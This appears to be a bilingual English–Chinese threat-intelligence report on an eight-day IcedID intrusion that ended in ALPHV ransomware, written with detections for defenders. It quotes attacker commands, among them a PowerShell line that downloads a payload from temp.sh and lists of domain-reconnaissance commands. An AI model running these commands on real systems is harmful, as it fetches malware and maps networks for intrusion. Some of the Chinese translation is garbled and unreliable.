IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Key Takeaways 关键要点

  • In October 2023, we observed an intrusion that began with a spam campaign, distributing a forked IcedID loader.
    2023 年 10 月,我们观察到一次始于垃圾邮件活动的入侵,分发了一个分叉的 IcedID 加载程序。
  • The threat actor used Impacket’s wmiexec and RDP to install ScreenConnect on multiple systems, enabling them to execute various commands and deploy Cobalt Strike beacons.
    威胁行为者使用 Impacket 的 wmiexec 和 RDP 在多个系统上安装 ScreenConnect,使他们能够执行各种命令并部署 Cobalt Strike 信标。
  • Their toolkit also included CSharp Streamer, a RAT written in CSharp with numerous functionalities, as documented here.
    他们的工具包还包括 CSharp Streamer,这是一个用 CSharp 编写的 RAT,具有许多功能,如此处所述。
  • The attacker used a custom tool to stage, and exfiltrate data, using Rclone.
    攻击者使用自定义工具通过 Rclone 暂存和泄露数据。
  • Eight days after initial access, ALPHV ransomware was deployed across all domain joined Windows systems.
    在首次访问八天后,ALPHV 勒索软件部署在所有已加入域的 Windows 系统中。

An audio version of this report can be found on SpotifyAppleYouTubeAudible, & Amazon.
本报告的音频版本可以在Spotify,Apple,YouTube,Audible和Amazon上找到。

The DFIR Report Services
DFIR报告服务

→ Click here to access the DFIR Lab related to this report ←
→ 点击这里访问与本报告相关的DFIR实验室←

Five new sigma rules were created from this report and added to our Private sigma Rules
根据此报告创建了五条新的西格玛规则,并将其添加到我们的私有西格玛规则中

Our Threat Feed was tracking the Cobalt Strike server in this case days before this case.
在这种情况下,我们的 Threat Feed 在此案例中跟踪了 Cobalt Strike 服务器,在此案例中是在此案例中。

  • Private Threat Briefs: Over 25 private reports annually, such as this one but more concise and quickly published post-intrusion.
    私人威胁简报:每年有超过 25 份私人报告,例如这份报告,但更简洁、更快速地发布在入侵后。
  • Threat Feed: Focuses on tracking Command and Control frameworks like Cobalt Strike, Metasploit, Sliver, etc.
    威胁源:专注于跟踪命令和控制框架,如 Cobalt Strike、Metasploit、Sliver 等。
  • All Intel: Includes everything from Private Threat Briefs and Threat Feed, plus private events, long-term tracking, data clustering, and other curated intel.
    所有英特尔:包括私人威胁简报和威胁源,以及私人事件、长期跟踪、数据集群和其他精选情报的所有内容。
  • Private Sigma Ruleset: Features 100+ Sigma rules derived from 40+ cases, mapped to ATT&CK with test examples.
    私有 Sigma 规则集:具有从 40+ 个案例中派生的 100+ 个 Sigma 规则,通过测试示例映射到 ATT&CK。
  • DFIR Labs: Offers cloud-based, hands-on learning experiences, using real data, from real intrusions. Interactive labs are available with different difficulty levels and can be accessed on-demand, accommodating various learning speeds.
    DFIR Labs:提供基于云的实践学习体验,使用来自真实入侵的真实数据。交互式实验室具有不同的难度级别,可以按需访问,以适应各种学习速度。

Contact us today for a demo!
今天就联系我们进行演示吧!

Table of Contents: 目录:

Case Summary 案例摘要

This intrusion began in October 2023 with a malicious email that enticed the recipient to download a zip archive containing a Visual Basic Script (VBS) and a benign README file. We assess with high confidence that this email was part of a spam campaign delivering a forked variant of IcedID. First reported by ProofPoint in February 2023, this forked IcedID variant lacks banking functionality and prioritizes payload delivery. Upon user interaction with the archive’s contents, the VBS file was executed, initiating the embedded forked IcedID loader.
此入侵始于 2023 年 10 月,当时是一封恶意电子邮件,诱使收件人下载包含 Visual Basic 脚本 (VBS) 和良性自述文件的 zip 存档。我们非常有信心地评估,这封电子邮件是垃圾邮件活动的一部分,该活动提供了 IcedID 的分叉变体。ProofPoint 于 2023 年 2 月首次报道,这种分叉的 IcedID 变体缺乏银行功能,并优先考虑有效载荷交付。在用户与存档内容交互时,将执行 VBS 文件,启动嵌入式分叉 IcedID 加载程序。

This was followed by the creation of a scheduled task to maintain persistence on the beachhead. The forked IcedID loader then communicated with a command and control server, leading to the dropping and execution of another IcedID DLL. Approximately two minutes after execution, the first round of discovery was observed using Windows native binaries, mirroring the activity seen in previously reported IcedID cases.
随后创建了一个计划任务,以保持滩头阵地的持久性。然后,分叉的 IcedID 加载程序与命令和控制服务器通信,导致丢弃和执行另一个 IcedID DLL。执行后大约两分钟,使用 Windows 本机二进制文件观察到第一轮发现,这与之前报告的 IcedID 案例中看到的活动相同。

Around two hours into the intrusion, the threat actor installed ScreenConnect on the beachhead using a renamed installer binary, “toovey.exe.” They executed multiple commands on the host via ScreenConnect. These commands included Windows utilities such as nltest and net for reconnaissance. They also used PowerShell cradles, bitsadmin, and certutil to attempt retrieval of Cobalt Strike beacons on the beachhead. They had a few stumbles while trying to download the Cobalt Strike beacons using temp.sh, resulting in downloading the HTML of the website rather than their intended payload file.
入侵大约两个小时后,威胁行为者使用重命名的安装程序二进制文件“toovey.exe”在滩头阵地安装了 ScreenConnect。他们通过 ScreenConnect 在主机上执行了多个命令。这些命令包括 Windows 实用程序,例如用于侦察的 nltest 和 net。他们还使用 PowerShell 底座、bitsadmin 和 certutil 尝试检索滩头阵地上的 Cobalt Strike 信标。他们在尝试使用 temp.sh 下载 Cobalt Strike 信标时遇到了一些绊脚石, 导致下载网站的 HTML 而不是他们预期的有效载荷文件.

Once the Cobalt Strike beacons were executed, they established communication with the Cobalt Strike command and control server. Within 20 minutes of this activity, a new payload, cslite.exe (CSharp Streamer C2), was dropped on the beachhead. CSharp Streamer is a multi-function remote access trojan that was first reported in 2021. During this intrusion, it was first used to access the LSASS process on the beachhead for credential access; and around 40 minutes after that, the threat actor performed a dcsync operation from the beachhead host to one of the domain controllers. The threat actor then copied a renamed ScreenConnect installer from the beachhead to a domain controller over SMB. The installation was completed using Impacket’s wmiexec script to remotely run the ScreenConnect installer.
一旦 Cobalt Strike 信标被执行,它们就会与 Cobalt Strike 命令和控制服务器建立通信。在这次活动的20分钟内,一个新的有效载荷cslite.exe(CSharp Streamer C2)被投放在滩头阵地上。CSharp Streamer 是一种多功能远程访问木马,于 2021 年首次报道。在这次入侵中,它首先被用于访问滩头阵地上的 LSASS 进程以进行凭据访问;大约 40 分钟后,威胁参与者执行了从滩头主机到其中一个域控制器的 DCSYNC 操作。然后,威胁参与者通过 SMB 将重命名的 ScreenConnect 安装程序从滩头阵地复制到域控制器。使用 Impacket 的 wmiexec 脚本完成安装,以远程运行 ScreenConnect 安装程序。

After installing ScreenConnect, we observed a log in to the domain controller using ScreenConnect to access the host. During this session, the threat actor dropped several CSharp Streamer payloads. Although they executed the files, we did not observe any network traffic to a command and control server at that time. Activity then ceased for approximately eight hours.
安装 ScreenConnect 后,我们观察到使用 ScreenConnect 登录到域控制器以访问主机。在此会话期间,威胁参与者丢弃了几个 CSharp Streamer 有效负载。尽管他们执行了这些文件,但我们当时没有观察到任何到命令和控制服务器的网络流量。活动随后停止了大约八个小时。

On the second day, the threat actor returned and performed network discovery on the domain controller using SoftPerfect’s network scanner. They then initiated an RDP connection from the domain controller to a backup server. The threat actor reviewed backups and running processes before dropping both a CSharp Streamer binary and a previously used ScreenConnect installer. These were then executed over the RDP session. Next, a Cobalt Strike beacon was run, and LSASS was accessed on the host.
第二天,威胁参与者返回并使用 SoftPerfect 的网络扫描程序在域控制器上执行网络发现。然后,他们启动了从域控制器到备份服务器的 RDP 连接。威胁参与者在删除 CSharp Streamer 二进制文件和以前使用的 ScreenConnect 安装程序之前检查了备份和正在运行的进程。然后,这些操作在 RDP 会话上执行。接下来,运行 Cobalt Strike 信标,并在主机上访问 LSASS。

Around eleven hours later, the threat actor dropped several Cobalt Strike beacons and attempted to execute them; however, no new command and control traffic was observed. The threat actor quickly removed the files. Four hours later, another ScreenConnect installer was dropped on the backup server and executed using wmiexec. A new RDP connection was then initiated to a second domain controller, and netscan was run again. Following this, ScreenConnect was installed on the second domain controller, and an RDP session was started from this domain controller to a file server. On the file server, both a Cobalt Strike beacon and the ScreenConnect installer were dropped and executed via the RDP session.
大约 11 小时后,威胁行为者投放了几个 Cobalt Strike 信标并试图处决它们;但是,未观察到新的命令和控制流量。威胁参与者迅速删除了这些文件。四个小时后,另一个 ScreenConnect 安装程序被放到备份服务器上,并使用 wmiexec 执行。然后,启动到第二个域控制器的新 RDP 连接,并再次运行 netscan。在此之后,在第二个域控制器上安装了 ScreenConnect,并启动了从此域控制器到文件服务器的 RDP 会话。在文件服务器上,Cobalt Strike 信标和 ScreenConnect 安装程序都被丢弃并通过 RDP 会话执行。

After three days of no significant activity, the threat actor returned. They dropped and executed a new ScreenConnect installer on the backup server via wmiexec and ran netscan again. Using RDP, they connected to the file server and used Mozilla Firefox to preview a few financial documents before running netscan there as well.
在三天没有重大活动后,威胁行为者又回来了。他们通过 wmiexec 在备份服务器上删除并执行了新的 ScreenConnect 安装程序,然后再次运行 netscan。使用RDP,他们连接到文件服务器,并使用Mozilla Firefox预览一些财务文档,然后在那里运行netscan。

The following day, a custom tool named “confucius_cpp” was dropped on the file server. Its functionalities included aggregation, staging, and compression of sensitive files. We observed the threat actor performing Google searches for the keyword “rclone” and subsequently downloading the rclone application on the file server. Instead of direct execution, the Rclone binary was started using a VBS script. Upon execution of this script, the previously staged data was successfully exfiltrated using Rclone to a remote server.
第二天,一个名为“confucius_cpp”的自定义工具被丢弃在文件服务器上。其功能包括敏感文件的聚合、暂存和压缩。我们观察到威胁参与者在 Google 上搜索关键字“rclone”,随后在文件服务器上下载 rclone 应用程序。Rclone 二进制文件不是直接执行,而是使用 VBS 脚本启动。执行此脚本后,使用 Rclone 成功将先前暂存的数据泄露到远程服务器。

On day seven of the intrusion, a RDP connection was initiated from the beachhead to the backup and the file server using CSharp Streamer. New ScreenConnect installers appear yet again and followed the same WMI execution pattern as before.
在入侵的第七天,使用 CSharp Streamer 启动了从滩头阵地到备份和文件服务器的 RDP 连接。新的 ScreenConnect 安装程序再次出现,并遵循与以前相同的 WMI 执行模式。

On the final day of the intrusion, the threat actor proceeded to push toward their final objectives. From the backup server, they ran a fresh netscan sweep and began staging both a ScreenConnect installer and an ALPHV ransomware binary. First, they used xcopy to stage the ScreenConnect installer across all Windows hosts in the domain and then executed it using a WMI command. This was then repeated for the ALPHV ransomware payload. During the execution, we observed the threat actor deleting all the backups interactively. Upon completion of the ransomware execution, a ransom note was left behind on the hosts. The time to ransomware (TTR) was around 180 hours, over the course of 8 days.
在入侵的最后一天,威胁行为者继续朝着他们的最终目标推进。他们从备份服务器运行了新的网络扫描扫描,并开始暂存 ScreenConnect 安装程序和 ALPHV 勒索软件二进制文件。首先,他们使用 xcopy 在域中的所有 Windows 主机上暂存 ScreenConnect 安装程序,然后使用 WMI 命令执行它。然后对 ALPHV 勒索软件有效载荷重复此操作。在执行过程中,我们观察到威胁参与者以交互方式删除了所有备份。勒索软件执行完成后,会在主机上留下赎金记录。勒索软件 (TTR) 的时间约为 180 小时,历时 8 天。

If you would like to get an email when we publish a new report, please subscribe here.
如果您想在我们发布新报告时收到电子邮件,请在此处订阅。

Analysts 分析师

Analysis and reporting completed by @yatinwad, and UC2.
@yatinwad 和 UC2 完成的分析和报告。

Initial Access 初始访问

Initial access began with a malicious e-mail. The malicious spam campaign can be linked to a publicly reported campaign from @JAMESWT_MHT encouraging victims to download and open a ZIP archive.
初始访问始于一封恶意电子邮件。恶意垃圾邮件活动可以链接到@JAMESWT_MHT公开报告的活动,鼓励受害者下载并打开 ZIP 存档。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Once the ZIP file was extracted the user was presented with a Readme and a Visual Basic Script (VBS) file.
提取 ZIP 文件后,用户将看到自述文件和 Visual Basic 脚本 (VBS) 文件。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

WScript.exe was called when executing the script, which starts the infection.
在执行脚本时调用了 WScript.exe,从而启动感染。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

The script embeds a DLL in a slightly obfuscated form and base64 encodes it, saves it in C:\Windows\Temp\0370-1.dll and then executes said DLL through regsvr32.
该脚本以略微模糊的形式嵌入 DLL,并使用 base64 对其进行编码,将其保存在 C:\Windows\Temp\0370-1.dll 中,然后通过 regsvr32 执行所述 DLL。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

This DLL is an IcedID loader as observed with sandboxing here. The infection chain was concluded by the loader dropping and executing another IcedID DLL via rundll32.
此 DLL 是一个 IcedID 加载程序,如此处的沙盒所示。通过加载程序通过 rundll32 删除并执行另一个 IcedID DLL,从而结束了感染链。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Execution 执行

ScreenConnect 屏幕连接

Once IcedID was operational, the threat actor used it to install the RMM tool ScreenConnect, renamed as toovey.exe.
一旦 IcedID 开始运行,威胁参与者就会使用它来安装 RMM 工具 ScreenConnect,并重命名为 toovey.exe。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Throughout the intrusion the threat actor dropped several more renamed ScreenConnect installers, usually employed after moving laterally to a new host and then executing it through Impacket’s wmiexec.py script:
在整个入侵过程中,威胁行为者又删除了几个重命名的 ScreenConnect 安装程序,这些安装程序通常在横向移动到新主机后使用,然后通过 Impacket 的 wmiexec.py 脚本执行它:

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Besides execution with wmiexec.py, some installers were executed during the threat actor RDP sessions:
除了使用 wmiexec.py 执行外,在威胁参与者 RDP 会话期间还执行了一些安装程序:

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

ScreenConnect was then used to execute various commands. This can be observed in logs, as ScreenConnect drops the desired script on disk, followed by the corresponding interpreter, as discussed in a previous report. This can be seen in various events, such as Security Event ID 4688 or Sysmon Event 1, as displayed below.
然后使用 ScreenConnect 执行各种命令。这可以在日志中观察到,因为 ScreenConnect 将所需的脚本放在磁盘上,然后是相应的解释器,如上一个报告中所述。这可以在各种事件中看到,例如安全事件 ID 4688 或 Sysmon 事件 1,如下所示。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Cobalt Strike 钴罢工

As in most intrusions we document, Cobalt Strike beacons were used in this intrusion. On the beachhead host, using ScreenConnect, the threat actor tried to download malicious Cobalt Strike beacons using bitsadmin, without success.
与我们记录的大多数入侵一样,Cobalt Strike 信标被用于这次入侵。在滩头主机上,威胁参与者使用 ScreenConnect,尝试使用 bitsadmin 下载恶意 Cobalt Strike 信标,但没有成功。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Besides process creation event logs, bitsadmin downloads can also be detected via event ID 59 and 60 of “Microsoft-Windows-Bits-Client/Operational” log.
除了进程创建事件日志外,还可以通过“Microsoft-Windows-Bits-Client/Operational”日志的事件 ID 59 和 60 检测 bitsadmin 下载。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Following this failure, they used another LOLBin named certutil to download their payloads, again via ScreenConnect. This behavior was repeated to download other Cobalt Strike beacons.
在此失败之后,他们使用另一个名为 certutil 的 LOLBin 再次通过 ScreenConnect 下载其有效负载。重复此行为以下载其他 Cobalt Strike 信标.

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

PowerShell was another tool used to retrieve Cobalt Strike beacons, again with some failures, and yet again using ScreenConnect.
PowerShell 是另一个用于检索 Cobalt Strike 信标的工具,再次出现一些故障,再次使用 ScreenConnect。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

In addition to the previously mentioned methods of retrieving additional payloads, there was another instance where the attackers used temp.sh to host their malware. However, a failure occurs when attempting to directly download a file from these links. Instead of obtaining the actual file, users end up downloading an HTML presentation page that prompts them to click a link to retrieve the file.
除了前面提到的检索额外有效负载的方法外,还有另一种攻击者使用 temp.sh 来托管其恶意软件的情况。但是,尝试从这些链接直接下载文件时会失败。用户最终下载的不是实际文件,而是 HTML 演示页面,提示他们单击链接以检索文件。

powershell Invoke-WebRequest "http://temp.sh/VSlAV/http64.exe" -OutFile C:\programdata\rr.exe
IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware DeploymentIcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

On another occasion, PowerShell usage was successful, and in those cases using Sysmon’s events we can trace child processes from PowerShell ParentCommandLine. For instance, the following display shows a payload used to launch https64.dll, another Cobalt Strike beacon.
在另一种情况下,PowerShell 的使用是成功的,在这些情况下,使用 Sysmon 的事件,我们可以从 PowerShell ParentCommandLine 跟踪子进程。例如,下面的显示屏显示了用于发射另一个 Cobalt Strike 信标 https64.dll 的有效载荷。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Because the beacon was using plain HTTP, the retrieved PowerShell payload can be extracted from the network communications.
由于信标使用纯 HTTP,因此可以从网络通信中提取检索到的 PowerShell 有效负载。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

As documented in Cobalt Strike, a Defender’s Guide part 1 and part 2, the attackers used Cobalt Strike’s default pipe names, which can be easily detected.
正如《Cobalt Strike, a Defender’s Guide》第 1 部分和第 2 部分中所记录的那样,攻击者使用了 Cobalt Strike 的默认管道名称,这些名称很容易被检测到。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Impacket

As part of their toolkit, the threat actor used Impacket’s wmiexec.py script to perform actions. This activity can be easily observed in logs because of the default redirect of its output to \\127.0.0.1\ADMIN$\__%timestamp% (as visible in the source code).
作为其工具包的一部分,威胁参与者使用 Impacket 的 wmiexec.py 脚本来执行操作。由于其输出默认重定向到 \\127.0.0.1\ADMIN$\__%timestamp%(如源代码中所示),因此可以在日志中轻松观察到此活动。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

CSharp Streamer CSharp 主播

During the intrusion, the threat actor deployed a binary named “cslite.exe” on the beachhead host. Upon investigation, we identified this binary as a RAT known as CSharp Streamer, thanks to an excellent write-up by Hendrik Eckardt. This malware combines many different functions and is a very capable remote access trojan. During this intrusion, we observed it dumping credentials, proxying RDP traffic, and providing command and control communications for the threat actor.
在入侵期间,威胁行为者在滩头主机上部署了一个名为“cslite.exe”的二进制文件。经过调查,我们确定这个二进制文件是被称为 CSharp Streamer 的 RAT,这要归功于 Hendrik Eckardt 的一篇出色的文章。该恶意软件结合了许多不同的功能,是一种非常强大的远程访问木马。在此入侵期间,我们观察到它转储凭据、代理 RDP 流量以及为威胁参与者提供命令和控制通信。

We were able to confirm the tool using memory analysis, and identifying known functions and commands in the previously linked report.
我们能够使用内存分析来确认该工具,并在之前链接的报告中识别已知的功能和命令。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

When executed, the tool writes a .NET executable to the %USERPROFILE%\AppData\Local\Temp folder using a .tmp extension and then loads it into memory, as seen in the Sysmon Event ID 7 event:
执行时,该工具使用 .tmp 扩展名将 .NET 可执行文件写入 %USERPROFILE%\AppData\Local\Temp 文件夹,然后将其加载到内存中,如 Sysmon 事件 ID 7 事件所示:

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Using dynamic analysis from running the sample in a malware analysis sandbox, we can observe the injected .NET assemblies:
使用在恶意软件分析沙盒中运行示例的动态分析,我们可以观察注入的 .NET 程序集:

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware DeploymentIcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Persistence 坚持

 IcedID IcedID的

IcedID registered a scheduled task for persistence, in the same manner as documented in several other reports.
IcedID 注册了用于持久性的计划任务,其方式与其他几个报告中记录的方式相同。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

The task was registered to be executed every hour after logon as indicated respectively by the following XML tags:
该任务已注册为在登录后每小时执行一次,分别由以下 XML 标记指示:

<Interval>PT1H</Interval>
<LogonTrigger id="LogonTrigger"><Enabled>true</Enabled></LogonTrigger>

ScreenConnect 屏幕连接

Upon installation, ScreenConnect persists across reboots with an auto-start service. This can be seen using the built-in System event logs (event ID 7045).
安装后,ScreenConnect 会在重新启动后通过自动启动服务保留。这可以使用内置的系统事件日志(事件 ID 7045)来查看。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Should the System event logs be unavailable (for instance if cleared by an threat actor), the service configuration is saved inside the SYSTEM registry file, which can be analyzed using Eric Zimmerman’s Registry Explorer tool, in the HKLM\CurrentControlSet\Services\ location.
如果系统事件日志不可用(例如,如果被威胁参与者清除),则服务配置将保存在 SYSTEM 注册表文件中,可以使用 Eric Zimmerman 的注册表资源管理器工具在 HKLM\CurrentControlSet\Services\ 位置进行分析。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Anomali Threat Research explained the parameters in their article :

  • e as session type, can be SupportMeetingAccess.
  • y as process type, can be Guest or Host.
  • h as the URI to the relay service’s URI.
  • p as the relay service’s port.
  • s as a globally unique identifier for client identification.
  • k as the encoded encryption key, used for identity verification.
  • t as the optional session name.

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Defense Evasion

Upon moving laterally to a backup server, we observed Cobalt Strike injection into legitimate process “winlogon.exe” and “rundll32.exe”.
在横向移动到备份服务器后,我们观察到 Cobalt Strike 注入到合法进程“winlogon.exe”和“rundll32.exe”中。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

By relying on memory captures, defenders may also have other detection methods. Here, by processing the acquired memory with MemprocFS and using the findevil command, we can find an injected beacon in winlogon.exe.
通过依赖内存捕获,防御者还可以使用其他检测方法。在这里, 通过使用 MemprocFS 处理获取的内存并使用 findevil 命令, 我们可以在 winlogon.exe 中找到注入的信标.

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware DeploymentIcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

During the intrusion, the threat actor deleted the renamed ScreenConnect installers from the backup server and the file server using the “del” command, in an attempt to cover their tracks.
在入侵期间,威胁参与者使用“del”命令从备份服务器和文件服务器中删除了重命名的 ScreenConnect 安装程序,试图掩盖其踪迹。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Credential Access 凭据访问

Credentials were extracted from LSASS (Local Security Authority Subsystem), a technique commonly seen during similar intrusions. On day one, through hands-on activity, the threat actor executed cslite.exe (a CSharp Streamer file dropped on the Desktop of a compromised user), which was used to access the LSASS process. Process access can be seen using Sysmon event ID 10, as displayed below.
凭据是从 LSASS(本地安全机构子系统)中提取的,这是一种在类似入侵中常见的技术。在第一天,通过动手活动,威胁参与者执行了cslite.exe(CSharp Streamer 文件丢弃在受感染用户的桌面上),该文件用于访问 LSASS 进程。可以使用 Sysmon 事件 ID 10 查看进程访问,如下所示。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Microsoft documented the granted accesses, which are the following:
Microsoft 记录了授予的访问权限,如下所示:

  • 0x1010: PROCESS_QUERY_LIMITED_INFORMATION (0x1000) and PROCESS_VM_READ (0x0010)
  • 0x1FFFFF: PROCESS_ALL_ACCESS

Another data point to look for is the UNKNOWN string in the CallTrace, which indicates Sysmon was not able to resolve the address of code from where the OpenProcessfunction was called, potential indication of a DLL in memory.

We also were able to collect memory and scan it with various YARA rules, confirming the use of a Mimikatz implementation with several rule hits for the cslite.exe memory space and file:

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

In another instance, we saw LSASS being accessed by WerFault.exe, with PROCESS_ALL_ACCESS granted. This should happen rarely in a production environment, and once again, the CallTrace can also help as CallTrace with ntdll.dll, dbghelp.dll or dbgcore.dll (source 1source 2) should be monitored.
在另一个例子中,我们看到 LSASS 被 WerFault.exe 访问,并获得了PROCESS_ALL_ACCESS。这在生产环境中应该很少发生,同样,CallTrace 也可以提供帮助,因为应该监控带有ntdll.dll、dbghelp.dll或dbgcore.dll(源 1、源 2)的 CallTrace。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Finally, on the second day, we can see yet another access to LSASS, this time from rundll32.exe, once again using access 0x1010 and with UNKNOWN in the CallTrace. This time, rundll32.exe was spawned by PowerShell, which was tasked to download and execute a Cobalt Strike beacon.
最后,在第二天,我们可以看到对 LSASS 的又一次访问,这次是从 rundll32.exe 开始的,再次在 CallTrace 中使用访问0x1010和 UNKNOWN。这一次,rundll32.exe是由 PowerShell 生成的,它的任务是下载和执行 Cobalt Strike 信标。

Around 40 minutes after the LSASS dump by the “cslite.exe” executable, we observed a traffic spike from the beachhead host to a domain controller. Reviewing this network traffic using the Suricata rules from Didier Stevens, we discovered potential Mimikatz dcsync activity between the hosts.
在“cslite.exe”可执行文件转储 LSASS 转储大约 40 分钟后,我们观察到从滩头主机到域控制器的流量激增。使用 Didier Stevens 的 Suricata 规则查看此网络流量,我们发现了主机之间潜在的 Mimikatz dcsync 活动。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

At the same time we found Event ID 4662 logs on the domain controller, confirming a sync operation requested by the “Administrator” account:
同时,我们在域控制器上发现了事件 ID 4662 日志,确认了“管理员”帐户请求的同步操作:

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Specifically, we were looking for the Domain-DNS Class(object) — Schema GUID: 19195a5b-6da0–11d0-afd3–00c04fd930c9 and DS-Replication-Get-Changes-All — Schema GUID: 1131f6ad-9c07–11d1-f79f-00c04fc2dcd2 as explained in this SpectreOps post, to detect this dcsync activity. Using these two points of evidence, we can say with good confidence that the threat actor performed a dcsync operation.
具体来说,我们正在寻找 Domain-DNS Class(object) — 架构 GUID:19195a5b-6da0–11d0-afd3–00c04fd930c9 和 DS-Replication-Get-Changes-All — 架构 GUID:1131f6ad-9c07–11d1-f79f-00c04fc2dcd2,如此 SpectreOps 帖子中所述,以检测此 dcsync 活动。使用这两个证据,我们可以很有信心地说,威胁参与者执行了 dcsync 操作。

Discovery 发现

Minutes after the initial compromise, a first round of discovery was observed using native Windows built-in utilities, spawning from the IcedID malware.
在最初入侵几分钟后,使用本机 Windows 内置实用程序观察到第一轮发现,这些实用程序是从 IcedID 恶意软件中生成的。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment
cmd.exe /c chcp >&2
ipconfig /all
systeminfo
net config workstation
nltest /domain_trusts
nltest /domain_trusts /all_trusts
net view /all /domain
net view /all
net group "Domain Admins" /domain

Later on, the threat actor used ScreenConnect to run other discovery commands, on several occasions

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

nltest  /dclist:
net  group "domain admins" /domain
net  group "Domain Computers" /domain
net  group "domain admins" /domain
net  group "enterprise admins" /domain
nltest  /dclist:
net  group "domain admins" /domain
quser
ipconfig  /all
net  group "domain computers" /domain
systeminfo
route  print
nltest  /dclist:

On day two, day five, and day eight, the threat actor performed rounds of network discovery using SoftPerfect netscan.

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Each time, the scan goes over the same IP address space, and scans for the ports 135 (RPC), 445 (SMB) and 3389 (RDP), with a few extras related to the Veeam backup solutions.
每次扫描都会通过相同的 IP 地址空间进行扫描,并扫描端口 135 (RPC)、445 (SMB) 和 3389 (RDP),以及一些与 Veeam 备份解决方案相关的附加功能。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Lateral Movement 横向移动

The renamed ScreenConnect installer was copied from the beachhead to domain controllers, a backup server, and a file server using SMB. As explained in the execution section, the installer was also executed via Impacket’s wmiexec.py script, which resulted in the ScreenConnect installation. Multiple commands were executed on the compromised hosts via ScreenConnect command functionality.
重命名的 ScreenConnect 安装程序已从滩头阵地复制到使用 SMB 的域控制器、备份服务器和文件服务器。如执行部分所述,安装程序也是通过 Impacket 的 wmiexec.py 脚本执行的,这导致了 ScreenConnect 安装。通过 ScreenConnect 命令功能在受感染的主机上执行了多个命令。

Event ID 5145 logs:
事件 ID 5145 日志:

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware DeploymentIcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

RDP was used extensively during the intrusion by the threat actor to move laterally.

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

While the threat actor most frequently used the native Windows RDP clients, on at least one occasion they proxied their RDP session via the CSharp Streamer.

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

When doing this, they left a trace of their remote host name logged under Event ID 4778:

77724F2

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Collection

Before initiating the exfiltration process, a custom tool called confucius_cpp.exe was dropped on a file server. This tool was used to aggregate, stage, and compress sensitive data files, using LDAP and creating multiple ZIP archives.

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

As seen when executing the tool in a lab environment, the LDAP query with search filter (&(objectClass=computer)) is first made to look for computers, as documented in Microsoft learn website.
如在实验室环境中执行该工具时所见,首先使用搜索过滤器 (&(objectClass=computer)) 进行 LDAP 查询以查找计算机,如 Microsoft Learn 网站中所述。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

Once the LDAP query is complete, the tool enumerates shared folders, filtering out some uninteresting folders such as NETLOGON or SYSVOL.
LDAP 查询完成后,该工具会枚举共享文件夹,过滤掉一些不感兴趣的文件夹,例如 NETLOGON 或 SYSVOL。

IcedID Brings ScreenConnect and CSharp Streamer to ALPHV Ransomware Deployment

On each selected folder, the tool will look for files based on keywords (in the screenshot they’re after the words security_reports and finance) before compressing data. This automates the collection phase, ensuring swift action across the whole network.
在压缩数据之前,该工具将根据关键字(在屏幕截图中,它们在单词 security_reports 和 finance 之后)查找文件。这实现了收集阶段的自动化,确保了整个网络的快速行动。

